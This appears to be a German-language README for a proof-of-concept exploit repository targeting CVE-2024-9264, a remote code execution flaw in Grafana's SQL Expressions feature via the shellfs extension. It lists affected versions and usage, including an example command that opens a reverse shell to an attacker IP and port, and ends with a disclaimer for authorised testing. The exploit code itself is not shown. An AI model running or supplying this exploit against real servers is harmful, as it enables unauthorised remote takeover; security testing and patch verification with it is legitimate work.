
Grafana-RCE-Exploit (CVE-2024-9264)
Proof of Concept für Remote Code Execution in Grafana (CVE-2024-9264)
Dieses Repository enthält ein Python-Skript, das eine Remote Code Execution (RCE)-Schwachstelle in der SQL-Expressions-Funktion von Grafana ausnutzt. Durch die Ausnutzung unzureichender Eingabebereinigung ermöglicht dieser Exploit einem Angreifer, beliebige Shell-Befehle auf dem Server auszuführen. Dies wird durch die Community-Erweiterung shellfs ermöglicht, die von einem Angreifer installiert und geladen werden kann, um die Befehlsausführung zu erleichtern.
Viewer-Berechtigungen oder höherGrafana >= v11.0.0 (alle v11.x.y sind betroffen)
python3 poc.py [--url <target>] [--username <username>] [--password <password>] [--reverse-ip <IP>] [--reverse-port <PORT>]

python poc.py --url http://127.0.0.1:3000 --username eviluser --password eviluser --reverse-ip 10.10.1.41 --reverse-port 9001
Dieses Skript ist für Bildungszwecke und für den Einsatz in kontrollierten Umgebungen gedacht, in denen Sie die Erlaubnis haben, die Sicherheit des Systems zu testen. Missbrauch dieses Tools kann rechtliche Konsequenzen haben.